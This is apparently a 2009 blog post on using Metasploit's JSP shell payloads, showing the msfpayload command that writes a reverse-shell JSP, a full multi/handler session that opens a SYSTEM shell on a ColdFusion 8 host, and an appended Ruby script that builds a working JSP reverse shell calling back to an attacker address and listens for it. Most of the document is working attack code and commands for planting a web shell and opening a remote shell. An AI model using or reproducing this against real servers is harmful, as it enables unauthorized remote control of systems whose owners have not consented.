Metasploit JSP Shells

Stephen Fewer has pushed a JSP reverse shell and a JSP bind shell into the Metasploit framework (modules/payloads/singles/java).

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them, but the easiest is to have msfpayload write the shell out in raw (R) format and upload the resulting .jsp to a server that will compile and execute JSP pages (the session below lands on a ColdFusion 8 host). For an example of driving the same payload from inside an exploit module, look at the Adobe RoboHelp exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb


yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there, start a multi/handler for java/jsp_shell_reverse_tcp with the same LHOST and LPORT, browse to the uploaded page (webpath/blah.jsp), and the JSP connects back and hands you a shell. Have the handler listening before you request the page, since the JSP makes its connection back at the moment the container executes it. The shell runs as whatever account the servlet container runs under; in the session below that is NT AUTHORITY\SYSTEM.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole

       =[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
       =[ 222 aux

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > info

       Name: Generic Payload Handler
    Version: 6558
   Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  hdm

Available targets:
  Id  Name
  --  ----
  0   Wildcard Target

Payload information:
  Space: 100000
  Avoid: 0 characters

Description:
  This module is a stub that provides all of the features of the
  Metasploit payload system to exploits that have been launched
  outside of the framework.

msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.1     yes       The local address
   LPORT  4444             yes       The local port
   SHELL  cmd.exe          yes       The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.2:42957)

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\ColdFusion8\runtime\bin>
whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>
exit
exit

[*] Command shell session 1 closed.
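As an added illustration (not the page's code and not the Metasploit module's), the Ruby below shows both halves of the procedure in miniature: build_jsp templates LHOST, LPORT and SHELL into a JSP reverse shell the way msfpayload does for java/jsp_shell_reverse_tcp, and serve_one does what exploit/multi/handler does for a command-shell payload, accepting one connection and relaying bytes between the socket and the operator's terminal. The JSP body, the helper names and the jsp/listen subcommands are this example's own assumptions, chosen to mirror the payload's structure (connect back, spawn the shell, copy streams in both directions).

```ruby
#!/usr/bin/env ruby
# Added example: a miniature msfpayload + multi/handler for a JSP reverse shell.
# Not the Metasploit module's code; the JSP body and helpers are this example's own.
require 'socket'
require 'stringio'

# Placeholder tokens are filled in by build_jsp. When the container executes the
# page it connects to LHOST:LPORT, starts SHELL, and relays bytes both ways.
JSP_TEMPLATE = <<~'JSP'
  <%@page import="java.io.*"%>
  <%@page import="java.net.*"%>
  <%
    // Copies one stream into another until EOF; two of these form a duplex relay.
    class StreamConnector extends Thread {
      InputStream is; OutputStream os;
      StreamConnector(InputStream is, OutputStream os) { this.is = is; this.os = os; }
      public void run() {
        byte[] buf = new byte[8192];
        int n;
        try {
          while ((n = is.read(buf)) > 0) { os.write(buf, 0, n); os.flush(); }
        } catch (Exception e) {}
        try { is.close(); os.close(); } catch (Exception e) {}
      }
    }
    try {
      // Connect back to the handler, then wire the shell's stdin/stdout to the socket.
      // (stderr of the shell is not captured, matching the original payload's behaviour.)
      Socket sock = new Socket("__LHOST__", __LPORT__);
      Process proc = Runtime.getRuntime().exec("__SHELL__");
      new StreamConnector(proc.getInputStream(), sock.getOutputStream()).start();
      new StreamConnector(sock.getInputStream(), proc.getOutputStream()).start();
    } catch (Exception e) {}   // a failed connect-back just yields an empty page
  %>
JSP

# Escape a value for use inside a Java string literal (backslashes and quotes).
def java_str(s)
  s.gsub('\\') { '\\\\' }.gsub('"') { '\\"' }
end

# Render the JSP for a given listener; Integer() rejects a non-numeric port.
def build_jsp(lhost:, lport:, shell: 'cmd.exe')
  JSP_TEMPLATE
    .sub('__LHOST__') { java_str(lhost) }
    .sub('__LPORT__') { Integer(lport).to_s }
    .sub('__SHELL__') { java_str(shell) }
end

# Minimal stand-in for exploit/multi/handler with a command-shell payload:
# accept one connection on +server+, relay socket -> output_io and
# input_io -> socket until both sides finish. Returns bytes received from the shell.
def serve_one(server, input_io, output_io)
  client = server.accept
  peer = client.remote_address
  output_io.puts "[*] Command shell session opened (#{peer.ip_address}:#{peer.ip_port})"
  received = 0
  reader = Thread.new do
    begin
      loop do
        chunk = client.readpartial(4096)
        received += chunk.bytesize
        output_io.write(chunk)
        output_io.flush
      end
    rescue EOFError, IOError
      # remote shell closed its end
    end
  end
  begin
    while (line = input_io.gets)   # operator input, one command per line
      client.write(line)
    end
  rescue IOError, SystemCallError
    # remote went away while we were still typing
  end
  client.close_write rescue nil    # EOF on our input: tell the remote we are done
  reader.join
  client.close rescue nil
  output_io.puts '[*] Command shell session closed.'
  received
end

# Usage (subcommands are this example's own):
#   ruby jsp_shell.rb jsp 192.168.10.1 4444 > blah.jsp   # upload blah.jsp, then:
#   ruby jsp_shell.rb listen 4444                        # and browse to webpath/blah.jsp
case ARGV[0]
when 'jsp'
  $stdout.write build_jsp(lhost: ARGV[1], lport: ARGV[2], shell: ARGV[3] || 'cmd.exe')
when 'listen'
  serve_one(TCPServer.new('0.0.0.0', Integer(ARGV[1])), $stdin, $stdout)
end
```

Start the listener before requesting the page, exactly as with multi/handler: the JSP's connect-back happens inside a try/catch at execution time, so a request made with nothing listening simply fails quietly and the page has to be requested again once the handler is up.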



Written on Thursday, 22 October 2009 08:55 by GSO
